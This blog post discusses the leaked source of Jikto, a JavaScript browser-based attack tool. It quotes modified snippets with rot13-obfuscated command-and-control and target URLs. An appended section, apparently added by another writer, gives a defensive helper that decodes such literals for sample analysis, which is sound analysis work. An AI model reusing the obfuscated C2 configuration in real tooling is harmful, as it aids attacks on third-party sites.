Update: Just to be clear this was not intentionally leaked. The source was in fact stolen by one of the audience participants. See the comments for details.
Well, I’m back! No, all that mess yesterday was not for real - I did not get an offer from Google, and I did not sell my site to a 13-year-old girl. It might come as a surprise to some of you, but I do like to have fun once in a while. Anyway, back to the webappsec stuff. This weekend the source of Jikto was officially leaked. How long did that take? Anyone time it? So much for this statement: “Although I will not be releasing the source code of Jikto….” There are a few things to note, although I haven’t gotten through all of it.
Firstly, it is only made up of a test HTML page, a single .JS file and a command and control file. Secondly, by the time I had received it, it had already been modified at least a few times, perhaps to test it, but nevertheless it is no longer the original function. Here are a few snippets from the modification (cleaned up, for readability if you can believe that):
var GUIURL = rot13("uggc://jjj.cragrfg.vg/wvxgb/pbageby.gkg"); //http://www.pentest.it/jikto/control.txt //http://localhost/JiktoControl/Collect.aspx?type= // uggc://ybpnyubfg/WvxgbPbageby/Pbyyrpg.nfck?glcr=
//var startUrlString = rot13("uggc://mreb.jronccfrphevgl.pbz/");
var startUrlString = rot13("uggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc"); //http://blackhat-forums.com/phpBB2/index.php uggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc
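The only thing hiding the control and start URLs in those lines is rot13, which is obfuscation, not encryption. The following is an added example, not code from the leaked file or from its author: a small analysis helper that scans a JavaScript source for rot13("...") literals (including the curly quotes that copy/paste introduced above) and decodes them, so an analyst reviewing a sample can list the URLs it embeds without running it. The sample input is constructed from the three assignments quoted above; the rot13 function and the extractRot13Literals name are this example's own.

```javascript
// Added example (not part of the leaked Jikto source): decode rot13-wrapped
// string literals in a JavaScript file so an analyst can see the URLs a
// sample actually references. Hypothetical helper names.

// Plain rot13: rotate ASCII letters by 13 positions, leave everything else.
function rot13(s) {
  return s.replace(/[a-zA-Z]/g, function (c) {
    var base = c <= 'Z' ? 65 : 97;
    return String.fromCharCode((c.charCodeAt(0) - base + 13) % 26 + base);
  });
}

// Find every rot13("..."), rot13('...') or rot13(”...”) call in the source,
// commented-out lines included, and return { encoded, decoded } pairs.
function extractRot13Literals(source) {
  var quote = '[\\"\'\\u201c\\u201d]';
  var re = new RegExp('rot13\\(\\s*' + quote + '([^\\"\'\\u201c\\u201d]*)' + quote + '\\s*\\)', 'g');
  var results = [];
  var m;
  while ((m = re.exec(source)) !== null) {
    results.push({ encoded: m[1], decoded: rot13(m[1]) });
  }
  return results;
}

// Constructed sample: the three assignments quoted in the post, curly quotes
// and all, as a copy/paste of the snippet would look.
var SAMPLE = [
  'var GUIURL = rot13(\u201duggc://jjj.cragrfg.vg/wvxgb/pbageby.gkg\u201d);',
  '//var startUrlString = rot13(\u201duggc://mreb.jronccfrphevgl.pbz/\u201d);',
  'var startUrlString = rot13(\u201duggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc\u201d);'
].join('\n');

// Run directly with node to print the decoded literals.
if (typeof require !== 'undefined' && require.main === module) {
  extractRot13Literals(SAMPLE).forEach(function (r) {
    console.log(r.encoded + ' -> ' + r.decoded);
  });
}
```

Decoding the commented-out literal as well is deliberate: a sample's history (earlier targets, test hosts) is often left behind in dead code, and those strings are worth the same scrutiny as the live ones.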